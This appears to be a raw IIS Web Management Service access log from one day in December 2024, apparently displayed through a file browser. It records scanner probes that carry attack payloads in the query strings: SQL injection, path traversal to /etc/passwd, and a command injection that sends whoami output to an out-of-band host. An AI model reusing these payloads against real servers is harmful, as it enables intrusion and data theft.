????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex241201.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 00:59:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 00:59:54 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 221 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 02:30:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 02:30:02 103.153.214.94 GET /wp-content/plugins/wp-filebase/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 220 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 04:01:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 04:01:55 103.153.214.94 POST /context.json - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 7 0 223 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 04:47:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 04:47:23 103.153.214.94 GET / - 8172 - 147.185.133.233 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 280 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 05:32:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 05:32:59 103.153.214.94 GET /wp-content/plugins/give/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 05:55:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 05:55:11 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 20 2024-12-01 05:55:11 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24 2024-12-01 05:55:11 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2024-12-01 05:55:11 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=b3e1cf0d-fabf-4152-ba72-41fafbc8a873;op=Sync - 200 0 0 389 2024-12-01 05:55:11 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 484 2024-12-01 05:55:11 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 11 2024-12-01 05:56:13 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=b3e1cf0d-fabf-4152-ba72-41fafbc8a873;op=Sync - 200 0 0 60890 2024-12-01 05:56:13 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 60921 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 07:05:14 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 07:05:14 103.153.214.94 GET /wp-content/plugins/work-the-flow-file-upload/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 08:31:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 08:31:32 103.153.214.94 POST /bic/ssoService/v1/applyAutoLoginTicket - 8172 - 107.189.28.251 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 10:07:41 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 10:07:41 103.153.214.94 GET /wp-content/plugins/google-map-wp/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 11:44:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 11:44:51 103.153.214.94 GET /wp-content/plugins/wp-easy-gallery/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 250 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 13:24:16 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 13:24:16 103.153.214.94 GET /wp-content/plugins/wp-live-chat-support/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.7.21 - 404 7 0 224 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 14:56:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 14:56:21 103.153.214.94 GET /compliancepolicies.inc.php search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 8172 - 107.189.28.251 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 15:38:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 15:38:31 103.153.214.94 GET / - 8172 - 162.216.150.200 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 283 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 16:42:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 16:42:38 103.153.214.94 GET /msa/main.xp Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 225 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 18:04:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 18:04:21 103.153.214.94 GET / - 8172 - 87.236.176.172 Mozilla/5.0+(compatible;+InternetMeasurement/1.0;++https://internet-measurement.com/) - 404 7 0 357 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 18:20:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 18:20:48 103.153.214.94 GET /wp-content/plugins/easy-career-openings/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 221 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 19:51:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 19:51:02 103.153.214.94 GET /index.php target=db_sql.php%253f/../../../../../../../../etc/passwd 8172 - 107.189.28.251 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 221 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 21:20:24 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 21:20:24 103.153.214.94 POST /login/index.php login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.ct6cdcppb3455fmc4ds0p7c5ryfacq434.oast.pro) 8172 - 107.189.28.251 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-01 22:43:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-01 22:43:46 103.153.214.94 GET / - 8172 - 35.203.211.103 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 263 2024-12-01 22:52:05 103.153.214.94 GET /wp-content/plugins/wp-file-uploader/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 250